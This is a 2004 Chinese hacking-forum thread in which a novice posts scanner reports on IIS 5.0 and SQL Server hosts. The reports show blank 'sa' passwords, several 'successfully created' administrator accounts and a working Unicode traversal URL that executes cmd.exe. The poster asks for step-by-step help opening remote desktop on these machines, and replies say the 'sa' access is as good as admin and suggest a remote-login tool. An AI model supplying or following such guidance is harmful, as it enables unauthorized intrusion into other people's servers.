返回列表 发帖
c123 该用户已被删除
楼主 跳转到 » 倒序看帖
打印
tT
c123发表于 2004-7-16 23:09 | 只看该作者

看我的扫描报告

端口扫描

110(POP3)
25(SMTP)
80(HTTP)
443(HTTPS)

--------------------------------------------------------------------------------
IIS扫描

FrontPage: FrontPage 扩展

--------------------------------------------------------------------------------
CGI扫描

WEB版本信息: Microsoft-IIS/5.0
扫描成功CGI漏洞
/_vti_bin/shtml.dll/_vti_rpc (HTTP: 200 )
/scripts/samples/search/author.idq (HTTP: 200 )
/scripts/samples/search/qfullhit.htw (HTTP: 200 )
/scripts/samples/search/filetime.idq (HTTP: 200 )
/scripts/samples/search/queryhit.idq (HTTP: 200 )
/scripts/samples/search/simple.idq (HTTP: 200 )
/scripts/samples/search/query.idq (HTTP: 200 )
/scripts/samples/search/filesize.idq (HTTP: 200 )
/scripts/samples/search/qsumrhit.htw (HTTP: 200 )
/abczxv.htw (HTTP: 200 )
/_vti_inf.html (HTTP: 200 )
/_vti_bin/shtml.dll/_vti_rpc (HTTP: 200 )
/_vti_bin/fpcount.exe (HTTP: 502 )
/blabla.idq (HTTP: 200 )
/_vti_bin/shtml.exe (HTTP: 200 )
/_vti_bin/shtml.dll (HTTP: 200 )
/*.ida (HTTP: 200 )
/?PageServices (HTTP: 200 )
/*.idq (HTTP: 200 )

--------------------------------------------------------------------------------
Plugins

IIS5.0 .Printer Exploit(Grant System Privileges)

接下来我应该做什么 我想给他开3389端口 要用什么工具和怎么做 怎么打命令 说的详细点啊 我是新手
收藏 分享

c123 该用户已被删除
沙发
c123发表于 2004-7-16 23:14 | 只看该作者

看我的扫描报告

SQL漏洞:
      sa帐号密码为空。
主机:  SQL漏洞:
      sa帐号密码为空。
主机:  SQL漏洞:
      sa帐号密码为空。
      建立系统管理员帐号(shanlu)成功。
主机:
  SQL漏洞:
      sa帐号密码为空。
主机:
  SQL漏洞:
      sa帐号密码为空。
主机:  SQL漏洞:
      sa帐号密码为空。
      建立系统管理员帐号(shanlu)成功。
主机:
  SQL漏洞:
      sa帐号密码为空。
主机:
  3389,Windows 2000 Advance Server Terminal 端口开放。
  IIS溢出:
      发现:.IDA远程溢出漏洞
      99端口开放成功。
主机:  SQL漏洞:
      sa帐号密码为空。
主机:
  SQL漏洞:
      sa帐号密码为空。
      建立系统管理员帐号(shanlu)成功
主机:  SQL漏洞:
      sa帐号密码为空
主机:  SQL漏洞:
      sa帐号密码为空
主机:  SQL漏洞:
      sa帐号密码为空。
主机:  SQL漏洞:
      sa帐号密码为空。
主机:  SQL漏洞:
      sa帐号密码为空。
      建立系统管理员帐号(shanlu)成功。
主机:  SQL漏洞:
      sa帐号密码为空。
主机:
  SQL漏洞:
      sa帐号密码为空
主机:
  SQL漏洞:
      sa帐号密码为空。
主机:  简单管理员密码:
      帐号:
      技术部()[Administrators][Users]
主机:  SQL漏洞:
      sa帐号密码为空。
      建立系统管理员帐号(shanlu)成功。
主机:  SQL漏洞:
      sa帐号密码为空。
http:///scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 可执行Url
主机:  可执行Url:
      发现:http:///scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
还有这些 都是怎么用啊 我是菜鸟啊 教教我

TOP

激进组织 该用户已被删除
板凳
激进组织发表于 2004-7-17 11:54 | 只看该作者

看我的扫描报告

得到了SA差不多得到了ADMIN权限,接下来什么都好办

TOP

爱中国 该用户已被删除
地板
爱中国发表于 2004-7-17 12:31 | 只看该作者

看我的扫描报告

用“远程登陆器”直接连接看看

TOP

c123 该用户已被删除
5
c123发表于 2004-7-17 14:48 | 只看该作者

看我的扫描报告

sql 主机:
SQL漏洞:
     sa帐号密码为空
这个怎么用啊 你们给我讲的详细点 是不是还有什么工具啊 

TOP

返回列表 回复 发帖